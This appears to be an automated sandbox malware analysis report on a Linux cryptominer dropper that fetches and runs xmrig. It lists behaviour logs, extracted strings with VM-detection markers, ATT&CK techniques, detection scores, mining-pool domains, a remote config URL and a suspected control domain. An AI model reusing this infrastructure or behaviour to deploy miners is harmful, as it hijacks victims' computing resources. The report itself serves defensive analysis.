Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/id			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Reads CPU info from /sys: /sys/devices/system/cpu/possible			Jump to behavior

Source: /tmp/xmr_linux_amd64 (2).elf (PID: 6258)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 6295)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 6305)	Queries kernel information via 'uname':			Jump to behavior

Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: HOST_PRO1888YHOST_PROCHOST_PROCvmtoolsd
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: * MOTHERBOARD VMware, Inc. - VMware Virtual Platform
Source: xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: vmtoolsd
Source: xmr_linux_amd64 (2).elf	Binary or memory string: cookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAserial:::ffff:TypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLanswers2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5amxtileamxint8amxbf16osxsave#intern
Source: xmr_linux_amd64 (2).elf	Binary or memory string: bindunix.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2/sysrolevboxselfEDOMEADVcap -> failbitsTypeasn1cx16sse2xmrigcbashbash2amd64unamegnamemtimeatimectimeUSTARfalse<nil>Error&"'https:**@Rangerangeclose:path%s %q%s=%sHTTP/socksFoundchdirwritemkdir$HOMEchmodlinuxgetwdpipe2lstatdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingfault[...]MarchAprilmonthLocalarray1562578125AppleIntelPOWERint16int32int64uint8slice$USERtls: Earlyparsefilesimap2imap3imapspop3shosts.avif.html.jpeg.json.wasm.webputf-8%s%dtext/Realmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3/procbtimeguestVxID:CLOSEEPERMESRCHEINTRENXIOE2BIGEBADFEBUSYEXDEVEFBIGEROFSEPIPEELOOPEIDRMEBADEEBADRETIMEENOSRECOMMSIGIOmatchrune SHA-1P-224P-256P-384P-521ECDSA (at TypeAClassxmrig1helperpc784foraclea851eb/xmrigStringFormat[]bytestringClosedCANCELGOAWAYPADDEDactiveclosedsocks5Basic CookieacceptallowcookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Kernel Modules and Extensions	1 Hide Artifacts	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Kernel Modules and Extensions	1 Sudo and Sudo Caching	1 File and Directory Permissions Modification	LSASS Memory	1 System Network Configuration Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Sudo and Sudo Caching	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xmr_linux_amd64 (2).elf	0%	ReversingLabs
xmr_linux_amd64 (2).elf	3%	Virustotal		Browse
xmr_linux_amd64 (2).elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/tmp/xmrig/xmrig-6.21.3/xmrig	100%	Avira	ANDROID/AVE.Miner.nezaa
/tmp/xmrig/xmrig-6.21.3/xmrig	100%	Joe Sandbox ML
/tmp/xmrig/xmrig-6.21.3/xmrig	71%	ReversingLabs	Linux.Trojan.Miner

Domains

Source	Detection	Scanner	Label	Link
pool-fr.supportxmr.com	3%	Virustotal		Browse
github.com	0%	Virustotal		Browse
raw.githubusercontent.com	0%	Virustotal		Browse
api.ipify.org	0%	Virustotal		Browse
objects.githubusercontent.com	1%	Virustotal		Browse
pool.supportxmr.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org?format=text	0%	Avira URL Cloud	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	Avira URL Cloud	safe
https://wwww.certigna.fr/autorites/0m	0%	Avira URL Cloud	safe
http://www.accv.es/legislacion_c.htm0U	0%	Avira URL Cloud	safe
https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-	0%	Avira URL Cloud	safe
http://ocsp.accv.es0	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
http://www.accv.es/legislacion_c.htm0U	0%	Virustotal		Browse
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1	0%	Avira URL Cloud	safe
https://wwww.certigna.fr/autorites/0m	0%	Virustotal		Browse
http://crl.dhimyotis.com/certignarootca.crl0	0%	Avira URL Cloud	safe
https://vmtracker.freechildporninthisserver.lol/postgresqlstore	0%	Avira URL Cloud	safe
https://api.ipify.org?format=text	0%	Virustotal		Browse
http://www.firmaprofesional.com/cps0	0%	Avira URL Cloud	safe
http://repository.swisssign.com/0	0%	Avira URL Cloud	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	Virustotal		Browse
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	2%	Virustotal		Browse
http://crl.securetrust.com/SGCA.crl0	0%	Avira URL Cloud	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	Virustotal		Browse
https://vmtracker.freechildporninthisserver.lol/postgresqlstoresoftirq	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1	0%	Virustotal		Browse
https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl0	0%	Virustotal		Browse
http://crl.securetrust.com/STCA.crl0	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	2%	Virustotal		Browse
https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json0E1	0%	Avira URL Cloud	safe
http://repository.swisssign.com/0	0%	Virustotal		Browse
https://gcc.gnu.org/bugsrg/bugs/):	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	Avira URL Cloud	safe
http://www.firmaprofesional.com/cps0	0%	Virustotal		Browse
https://api.ipify.org/?format=text	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crl0	0%	Virustotal		Browse
http://www.quovadisglobal.com/cps0	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	Virustotal		Browse
https://api.ipify.org/?format=text	0%	Virustotal		Browse
http://www.quovadisglobal.com/cps0	0%	Virustotal		Browse
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	0%	Virustotal		Browse
https://www.ubuntu.com/legal/terms-and-policies/privacy-policy	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	0%	Virustotal		Browse
http://crl.xrampsecurity.com/XGCA.crl0	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	Avira URL Cloud	safe
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	Virustotal		Browse
https://www.ubuntu.com/legal/terms-and-policies/privacy-policy	0%	Virustotal		Browse
http://crl.certigna.fr/certignarootca.crl01	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	2%	Virustotal		Browse
https://api.ipify.org?format=textcpu1	0%	Avira URL Cloud	safe
https://gcc.gnu.org/bugsrg/bugs/):	1%	Virustotal		Browse
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	2%	Virustotal		Browse
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz	0%	Avira URL Cloud	safe
http://www.cert.fnmt.es/dpcs/0	0%	Avira URL Cloud	safe
http://policy.camerfirma.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pool-fr.supportxmr.com	141.94.96.195	true	false	3%, Virustotal, Browse	unknown
github.com	140.82.121.3	true	false	0%, Virustotal, Browse	unknown
raw.githubusercontent.com	185.199.109.133	true	false	0%, Virustotal, Browse	unknown
api.ipify.org	104.26.12.205	true	false	0%, Virustotal, Browse	unknown
objects.githubusercontent.com	185.199.111.133	true	false	1%, Virustotal, Browse	unknown
pool.supportxmr.com	unknown	unknown	true	8%, Virustotal, Browse	unknown
vmtracker.freechildporninthisserver.lol	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/?format=text	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org?format=text	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es/legislacion_c.htm0U	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/0m	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.accv.es0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	xmrig.12.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vmtracker.freechildporninthisserver.lol/postgresqlstore	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://www.firmaprofesional.com/cps0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.swisssign.com/0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	xmrig.12.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
